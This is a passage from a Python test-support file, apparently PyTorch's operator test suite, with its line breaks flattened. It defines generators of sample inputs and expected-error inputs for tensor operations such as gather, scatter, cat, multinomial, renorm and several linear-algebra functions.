('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp1 = make_input((10, )) inp1[2] = float('nan') inp2 = make_input((10, )) inp2[4] = float('nan') target = make_input((10, )) inp2[9] = float('nan') yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) # Inf handling inp1 = make_input((10, )) inp2[1] = float('inf') inp2 = make_input((10, )) inp2[4] = float('inf') target = make_input((10, )) inp2[7] = float('inf') yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) # Broadcasting inp1 = make_input((5, 2)) inp2 = make_input((5, 1)) target = make_input((1, 2)) yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) def error_inputs_margin_ranking_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value. yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') # invalid input shapes yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5,),)), error_regex='margin_ranking_loss : All input tensors should') def sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), (), {}), ((S, S), (2, 0), {}), ((0, S, 0), (3, 2, 2), {}), ((S,), (2, 3), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), (10,), {'dtype': torch.double}), ((S,), (1, 1, 12), {'device': 'cpu'}), ((S,), (2, 2, 2), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), (7, 2), {'device': 'cuda'})) samples = [] for input_shape, output_shape, kwargs in inputs: t = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(output_shape,), kwargs=kwargs)) return tuple(samples) def sample_inputs_empty(op, device, dtype, requires_grad, **kwargs): # shape cases = ( (), (0,), (1,), (1, 3, 5), (5, 3, 1), (1, 0, 5, 1), ) for case in cases: _kwargs = {'device': device, 'dtype': dtype, 'requires_grad': requires_grad} yield SampleInput(case, args=(), kwargs=_kwargs) def sample_inputs_new_full(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() samples = [] for sample in sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): # The scalar we are passing to new_full must be the same dtype # as the one of the resulting tensor use_dtype = sample.kwargs['dtype'] if 'dtype' in sample.kwargs else dtype samples.append(SampleInput( sample.input, args=sample.args + (get_val(use_dtype),), kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_full_like(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() inputs = [ ((), get_val(dtype), {}), ((S, S), get_val(dtype), {}), ((0, S, 0), get_val(dtype), {}), ((S,), get_val(dtype), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), get_val(torch.double), {'dtype': torch.double}), ((S,), get_val(dtype), {'device': 'cpu'}), ((S,), get_val(torch.double), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), get_val(dtype), {'device': 'cuda'})) samples = [] for shape, fill_value, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(fill_value,), kwargs=kwargs)) return tuple(samples) def sample_inputs_multinomial(self, device, dtype, requires_grad, **kwargs): cases = [ ([3], 3, dict()), ([10], 3, dict()), ([3, 10], 3, dict()), ([3], 3, dict(replacement=False)), ([3], 3, dict(replacement=True)), ([3, 4], 4, dict(replacement=True)), ([3, 4], 4, dict(replacement=False)), ] samples = [] for shape, num_samples, kwargs in cases: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(num_samples,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs): def get_value_or_make_tensor(value_or_shape): if isinstance(value_or_shape, list): return make_tensor(value_or_shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) return value_or_shape samples = [] for value_or_mean_shape, value_or_std_shape, kwargs in cases: mean = get_value_or_make_tensor(value_or_mean_shape) std = get_value_or_make_tensor(value_or_std_shape) samples.append(SampleInput(mean, args=(std,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_tensor_first(self, device, dtype, requires_grad, **kwargs): # value_or_size, value_or_size, kwargs cases = [ ([], [], {}), ([3], [3], {}), ([3, 4, 2], [3, 4, 2], {}), ([2, 3], 1.1, {}), ([1, 2, 3], [5, 2, 3], {}), # broadcasting ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_normal_tensor_second(self, device, dtype, requires_grad, **kwargs): cases = [ ([3, 4], 0.3, {}), ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_bernoulli(self, device, dtype, requires_grad, **kwargs): shapes = [ [3], [], [0, 3], [2, 3, 4], ] samples = [] for shape in shapes: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=1, requires_grad=requires_grad) samples.append(SampleInput(t)) return tuple(samples) def sample_inputs_logcumsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((S, S, S), 0), ((S, S, S), 1), ((), 0), ) samples = [] for large_number in (True, False): for shape, dim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if large_number and t.dim() > 0: t[0] = 10000 samples.append(SampleInput(t, args=(dim,))) return tuple(samples) def sample_inputs_trace(self, device, dtype, requires_grad, **kwargs): return (SampleInput((make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))),) def sample_inputs_renorm(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2, 1, 0.5)), ((S, S, S), (2, -1, 0.5)), ((S, S, S), (1, 2, 3)), ((S, S, S), (float('inf'), 2, 0.5)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_transpose_swapdims(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((1, 2, 3), (-1, -2)), ((1, 2, 3), (-1, 2)), ((1, 2, 3), (1, -2)), ((1, 2, 3), (1, 2)), ((), (0, 0)), ((1, ), (0, 0)), ((M, M), (0, 1)), ((S, S, S), (2, 0)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _numpy_ref_transpose(a, dim0, dim1): if a.ndim <= 1: return a return np.swapaxes(a, dim0, dim1) def sample_inputs_adjoint(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((1, 2, 3), (), (M, M), (S, S, S), (S, M, S), (M, S, M, S)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_T(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (M, M)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates invertible inputs for linear algebra ops The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. """ make_fn = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] for batch, n in product(batches, ns): yield SampleInput(make_arg(*batch, n, n)) def sample_inputs_linalg_pinv_singular(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces factors `a` and `b` to generate inputs of the form `a @ b.t()` to test the backward method of `linalg_pinv`. That way we always preserve the rank of the input no matter the perturbations applied to it by the gradcheck. Note that `pinv` is Frechet-differentiable in a rank-preserving neighborhood. """ batches = [(), (0, ), (2, ), (1, 1)] # the size of at least 30 is required to cause failures for the previous implicit implementation # of the pinv's backward method, albeit it is slow. size = [0, 3, 50] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): # Note that by making the columns of `a` and `b` orthonormal we make sure that # the product matrix `a @ b.t()` has condition number 1 when restricted to its image a = torch.rand(*batch, m, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) b = torch.rand(*batch, n, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) yield SampleInput(a, args=(b,)) def sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces two tensors of shape (*, m, k) and (*, n, k) with k <= min(m, n). Their matrix product could be used to generate tensor of shape (*, m, n) of rank k. """ batches = [(), (0, ), (2, ), (1, 1)] size = [1, 5, 10] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): a = make_tensor((*batch, m, k), dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor((*batch, n, k), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=kwargs) def clone_sample(sample, **kwargs): """ Given a SampleInput, this function analyzes its input, args and kwargs, and produces a copy with each non-Tensor entry being copied by reference, and with each Tensor entry cloned with `t.clone().requires_grad_(t.requires_grad)` """ def clone_tensor(t): if isinstance(t, torch.Tensor): return t.detach().clone().requires_grad_(t.requires_grad) else: return t sample_kwargs = kwargs if kwargs else sample.kwargs return SampleInput( clone_tensor(sample.input), args=tuple(map(clone_tensor, sample.args)), kwargs=dict(((k, clone_tensor(v)) for k, v in sample_kwargs.items())) ) def sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad=False, **kwargs): for sample in sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad, **kwargs): *batch, m, k = sample.input.shape *_, n, _ = sample.args[0].shape # NOTE: since svd_lowrank relies on non rank-revealing SVD, # it inherits the problem of unstable behavior with repeated # singular values including zeros. # Since we want to avoid (repeated) zeros as singular values, # we can only use k for q. # This issues could be resolved with using a rank-revealing SVD # which does not include "zero" singular values. op_kwargs = { 'q': k, 'M': None } # without M specified yield clone_sample(sample, **op_kwargs) # now with M # TODO: fix bug in the documentation for svd_lowrank: # M has to be (*, m, n), and not (*, 1, n) as written # in the documentation op_kwargs['M'] = make_tensor((*batch, m, n), dtype=dtype, device=device, requires_grad=requires_grad) yield clone_sample(sample, **op_kwargs) def chunk_iter(iterable, size): it = iter(iterable) while True: chunk = tuple(islice(it, size)) if not chunk: break yield chunk def sample_inputs_pca_lowrank(op_info, device, dtype, requires_grad=False, **kwargs): # we reuse samples from svd_lowrank which come in group of two with # kwarg['M'] = None and with kwarg['M'] = <some tensor> samples = sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad, **kwargs) for s1, s2 in chunk_iter(samples, 2): del s1.kwargs['M'] del s2.kwargs['M'] s1.kwargs['center'] = False s2.kwargs['center'] = True yield s1 yield s2 def sample_inputs_linalg_cond(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # autograd is not supported for inputs with zero number of elements shapes = ((S, S), (2, S, S), (2, 1, S, S), ) for shape in shapes: yield SampleInput(make_arg(shape)) def sample_inputs_linalg_vander(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (1,), (S,), (2, S),) for shape in shapes: if len(shape) > 0 and shape[-1] > 1: yield SampleInput(make_arg(shape)) n = shape[-1] if len(shape) > 0 else 1 for i in range(3): # n-1, n, n+1 N = n + i - 1 if N < 2: continue yield SampleInput(make_arg(shape), kwargs=dict(N=N)) def np_vander_batched(x, N=None): # Wrapper around np.vander that supports batches of 1 dimension (enough for the tests) if x.ndim == 0: x = x[np.newaxis] if x.ndim == 1: y = np.vander(x, N=N, increasing=True) return y else: if N is None: N = x.shape[-1] y = np.vander(x.ravel(), N=N, increasing=True).reshape((*x.shape, N)) return y def np_sinc_with_fp16_as_fp32(x): # Wraps numpy's sinc function so that fp16 values are promoted to fp32 # before sinc is invoked. Context: numpy's sinc returns NaN when evaluated # at 0 for fp16. if x.dtype == np.float16: return np.sinc(x.astype(np.float32)) else: return np.sinc(x) def sample_inputs_broadcast_to(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, 1, 1), (S, S, S)), ((S, 1, S), (S, S, S)), ((S, 1), (S, S, S)), ((1,), (S, S, S)), ((1, S), (1, 1, S)), ((), ()), ((), (1, 3, 2)), ) return tuple( SampleInput( make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(shape,)) for size, shape in test_cases) def sample_inputs_broadcast_tensors(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases: Tuple[tuple] = (((3,), (1, 2, 1), (1, 1), (5, 1, 1),),) samples: List[SampleInput] = [] for shape, *other_shapes in test_cases: samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes))) return samples def reference_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs) m = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) n = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True) cases = ( ((), (1, 1), (1, 1, 7, 1), (3, 1, 1)), ((3, 5, 6), (1, 3, 5, 6), (1, 1, 1, 1, 6), (8, 3, 5, 6)) ) for a, b, c, d in cases: yield SampleInput(m(a), args=(m(b), m(c), m(d))) yield SampleInput(n(a), args=(n(b), n(c), n(d))) def sample_inputs_block_diag(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases: Tuple[tuple] = ( ((1, S), (2, S), (3, S),), ((S, 1), (S, 2), (S, 3),), ((1,), (2,), (3,),), ((2, S), (S,)) ) samples: List[SampleInput] = [] for shape, *other_shapes in test_cases: samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes))) # We also want to test mixed complex-non-complex inputs to block_diag if dtype == torch.complex32 or dtype == torch.complex64: non_complex_dtype = torch.float32 if dtype == torch.complex32 else torch.float64 make_arg_non_complex = partial(make_tensor, dtype=non_complex_dtype, device=device, requires_grad=requires_grad) samples.append(SampleInput(make_arg_non_complex(shape), args=tuple(make_arg(s) for s in other_shapes))) return samples def sample_inputs_cdist(op_info, device, dtype, requires_grad, **kwargs): small_S = 2 test_cases = ( ((S, S, 2), (S, S + 1, 2)), ((S, S), (S, S)), ((S, S, S), (S, S, S)), ((3, 5), (3, 5)), ((2, 3, 5), (2, 3, 5)), ((1, 2, 3), (1, 2, 3)), ((1, 1), (S, 1)), ((0, 5), (4, 5)), ((4, 5), (0, 5)), ((0, 4, 5), (3, 5)), ((4, 5), (0, 3, 5)), ((0, 4, 5), (1, 3, 5)), ((1, 4, 5), (0, 3, 5)), # Using S here would make this one test take 9s ((small_S, small_S, small_S + 1, 2), (small_S, small_S, small_S + 2, 2)), ((small_S, 1, 1, small_S), (1, small_S, small_S)), ((1, 1, small_S), (small_S, 1, small_S, small_S)), ) samples = [] for cm in ['use_mm_for_euclid_dist', 'donot_use_mm_for_euclid_dist']: # FIXME add an override for JIT and revert 0. back to 0 # since it's accepted by eager for p in [0., 1., 2., 3., 0.5, 1.5, 2.5, float("inf")]: for t1_size, t2_size in test_cases: # The args should never be non-contiguous as this is not supported in the backward samples.append(SampleInput( make_tensor(t1_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(t2_size, dtype=dtype, device=device, requires_grad=requires_grad), p, cm))) return samples def sample_inputs_fill_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) cases = (((S, S, S), (1,)), ((), (1,)), ((S, S, S), (make_arg(()),))) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _fill_np(a, value): a = a.copy() a.fill(value) return a def _fill_aten(a, value): t = a * False with torch.no_grad(): t.fill_(value) return t def _fill_sample_kwargs(device, dtype, input): if dtype is torch.bool: value = True else: value = 3 return ({'value': value}, {'value': value}) def sample_inputs_comparison_ops(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds a sample input where both tensors have the same values make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S)) yield SampleInput(lhs, args=(lhs.clone(),)) def sample_inputs_stack(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # shape x number of tensors cases = ( ((3, 4), 1), ((1, 2, 1, 4), 3), ((0, 1, 0), 2),) for shape, num_tensors in cases: tensors = [] for _ in range(num_tensors): tensors.append(make_arg(shape)) for dim in range(-1, len(shape) - 1): yield SampleInput(tensors, args=(dim,)) def sample_inputs_cat_concat(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases: Tuple[tuple, tuple, dict] = ( # type: ignore[assignment] ((S, S), (S, S), {'dim': -1}), ((S, S), (S, S), {'dim': 1}), ((M, S), (S, S), {'dim': 0}), # different shapes ((1, 2, 3), (1, 2, 3), {'dim': -2}), ((0,), (0,), {'dim': 0}), # empty tensor ((0, S), (S, S), {'dim': 0}), ((1,), (1,), {}) # dim not passed, fallback to default ) for input_shape1, input_shape2, kwargs in cases: yield SampleInput([make_arg(input_shape1), make_arg(input_shape2)], kwargs=kwargs) def reference_inputs_cat(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_cat_concat(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Noncontiguous type promoting tensors a = make_arg((3, 4, 2)) b = make_arg((3, 2, 2), noncontiguous=True, dtype=torch.double) c = make_arg((3, 3, 2), dtype=torch.float16).permute(1, 0, 2) yield SampleInput((a, b, c), kwargs={'dim': 1}) # Special 1D tensor with dim length of 0 case a = make_arg((0,)) b = make_arg((3, 2, 2)) yield SampleInput((a, b, a)) yield SampleInput((a, a, a)) def _elementwise_type_promo_np(*args, type_promotion_kind): def _maybe_torch(x): if isinstance(x, np.ndarray): return torch.from_numpy(x) return x flattened = tree_flatten(args)[0] transformed = tuple(_maybe_torch(a) for a in flattened) result_dtype, _ = prims.utils.elementwise_dtypes( *transformed, type_promotion_kind=type_promotion_kind) return torch_to_numpy_dtype_dict[result_dtype] def _cat_np(input_seq, dim=0): inputs = tuple(a for a in input_seq if not (a.ndim == 1 and a.size == 0)) if len(inputs) == 0: np_dtype = _elementwise_type_promo_np( input_seq, type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.NO_OPMATH) return np.empty(0, dtype=np_dtype) return np.concatenate(inputs, axis=dim) def _floor_divide_np(a, b): dtype = _elementwise_type_promo_np( a, b, type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.DEFAULT) if isinstance(a, np.ndarray): a = a.astype(dtype) if isinstance(b, np.ndarray): b = b.astype(dtype) return np.floor_divide(a, b) def sample_inputs_hstack_dstack_vstack(op_info, device, dtype, requires_grad, **kwargs): tensors = [ make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), ] return (SampleInput(tensors),) def sample_inputs_gather(op_info, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, gather_variable((S, S), 1, M, True, device=device))), SampleInput( make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(1, gather_variable((M, S // 2), 0, S, True, device=device))), SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, torch.tensor([0], dtype=torch.int64, device=device))), # Empty index tensor case, see: https://github.com/pytorch/pytorch/pull/65006 SampleInput( make_tensor((S,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, torch.tensor([], dtype=torch.uint8, device=device))), SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(0, torch.tensor(0, dtype=torch.int64, device=device))), ) def _fill_indices(idx, dim, dim_size, elems_per_row, m, n, o): for i in range(1 if dim == 0 else m): for j in range(1 if dim == 1 else n): for k in range(1 if dim == 2 else o): ii = [i, j, k] ii[dim] = slice(0, idx.size(dim) + 1) idx[tuple(ii)] = torch.randperm(dim_size)[0:elems_per_row] def error_inputs_gather(op_info, device, **kwargs): # src is [1, 2] # [3, 4] src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) # idx is [0, 0] # [1, 0] idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long) # Index should be smaller than self except on dimesion 1 bad_src = make_tensor((1, 1), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(bad_src, args=(1, idx,)), error_regex="Size does not match at dimension 0") # Index must have long dtype bad_idx = idx.to(torch.int32) yield ErrorInput(SampleInput(src, args=(1, bad_idx)), error_regex="Expected dtype int64 for index") # TODO: FIXME # out.dtype must match src.dtype # Creates new src & idx since SampleInputs can't share tensors src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long) out = torch.empty((2, 2), device=device, dtype=torch.float64) yield ErrorInput(SampleInput(src, args=(1, idx), kwargs={'out': out}), error_regex="Expected out tensor to have dtype") # src and index tensors must have the same # of dimensions # idx too few dimensions src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) idx = torch.tensor((0, 0), device=device, dtype=torch.long) yield ErrorInput(SampleInput(src, args=(1, idx)), error_regex="Index tensor must have the same number of dimensions") # src too few dimensions src = torch.tensor((1, 2), device=device, dtype=torch.float32) idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long) yield ErrorInput(SampleInput(src, args=(0, idx)), error_regex="Index tensor must have the same number of dimensions") # index out of bounds # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices if torch.device(device).type == 'cpu': src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) idx = torch.tensor(((0, 23), (1, 0)), device=device, dtype=torch.long) yield ErrorInput(SampleInput(src, args=(1, idx,)), error_regex="index 23 is out of bounds for dimension") x = torch.rand((1,), device=device).expand((3,)) src = torch.rand((6,), device=device) ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64) yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=src)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(ind.clone(), args=(0, ind[1:],), kwargs=dict(out=ind[:1])), error_type=RuntimeError, error_regex='unsupported operation') def error_inputs_take(op_info, device, **kwargs): x = torch.rand((1,), device=device).expand((3,)) src = torch.rand((6,), device=device) ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64) yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=src)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(ind.clone(), args=(ind[1:],), kwargs=dict(out=ind[:-1])), error_type=RuntimeError, error_regex='unsupported operation') # Error inputs for scatter def error_inputs_scatter_and_scatter_add(op_info, device, **kwargs): # Error when self.dtype != src.dtype (and src is not a scalar) src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5), device=device, dtype=torch.double) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Expected self.dtype to be equal to src.dtype") # Index dtype must be long src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.int32) dst = torch.zeros((3, 5), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Expected dtype int64 for index") # Index and destination must have the same number of dimensions src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5, 3), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Index tensor must have the same number of dimensions as self tensor") # Index and src must have the same number of dimensions when src is not a scalar src = make_tensor((2, 5, 2), device=device, dtype=torch.float32) idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Index tensor must have the same number of dimensions as src tensor") # Index out of bounds # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices if torch.device(device).type == 'cpu': src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="index 34 is out of bounds for dimension 0 with size 3") def error_inputs_renorm(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(0.5, 0, 1.0)), error_type=RuntimeError, error_regex="needs at least 2 dimensions, got 0 dimensions") def error_inputs_lstsq(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError, error_regex="iteration over a 0-d tensor") def error_inputs_eig(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(False,)), error_type=RuntimeError, error_regex="input should be 2 dimensional") yield ErrorInput(SampleInput(zero_d, args=(True,)), error_type=RuntimeError, error_regex="input should be 2 dimensional") def error_inputs_ormqr(op_info, device, **kwargs): # this is only implemented on cpu if (torch.device(device).type == 'cpu'): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(zero_d, zero_d)), error_type=RuntimeError, error_regex="input must have at least 2 dimensions") def error_inputs_diag(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError, error_regex="iteration over a 0-d tensor") def error_inputs_embedding(op_info, device, **kwargs): indices = torch.rand(2, 2, device=device).long() weights = [ torch.tensor(1.0, device=device), torch.tensor(1.0, device=device).reshape(1, 1, 1), ] for weight in weights: yield ErrorInput(SampleInput(weight, args=(indices,)), error_type=RuntimeError, error_regex="'weight' must be 2-D") def error_inputs_t(op_info, device, **kwargs): yield ErrorInput( SampleInput(torch.randn(2, 3, 4, 5, device=device)), error_type=RuntimeError, error_regex="expects a tensor with <= 2", ) def error_inputs_multinomial(op_info, device, **kwargs): x = torch.empty(1, 2, 3, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError, error_regex="prob_dist must be 1 or 2 dim") x = torch.empty(1, 2, dtype=torch.long, device=device) yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError, error_regex="multinomial only supports floating-point dtypes for input") x = torch.empty(1, 2, dtype=torch.double, device=device) y = torch.empty(1, 2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(2,), kwargs=dict(out=y)), error_type=RuntimeError, error_regex="multinomial expects Long tensor out") x = torch.empty(2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(0,)), error_type=RuntimeError, error_regex="cannot sample n_sample <= 0 samples") x = torch.empty(2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(-1,)), error_type=RuntimeError, error_regex="cannot sample n_sample <= 0 samples") x = torch.empty(2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(3, False,)), error_type=RuntimeError, error_regex="cannot sample n_sample > prob_dist") x = torch.empty(16777217, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(3,)), error_type=RuntimeError, error_regex="number of categories cannot exceed") def error_inputs_gradient(op_info, device, **kwargs): for dtype in [torch.long, torch.float32, torch.complex64]: t = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]], device=device, dtype=dtype) dim = (1, 0) spacing = [0.1] yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)), error_type=RuntimeError, error_regex='torch.gradient expected spacing to be unspecified, a scalar ') yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=3)), error_type=RuntimeError, error_regex='torch.gradient only supports edge_order=1 and edge_order=2.') dim = (1, 1) spacing = 0.1 yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)), error_type=RuntimeError, error_regex='dim 1 appears multiple times in the list of dims') dim = (0, 1) coordinates = [torch.tensor([1, 2, 4], device='cpu'), torch.tensor([1, 2, 4], device='meta')] yield ErrorInput(SampleInput(t, kwargs=dict(spacing=coordinates, dim=dim, edge_order=1)), error_type=RuntimeError, error_regex='torch.gradient expected 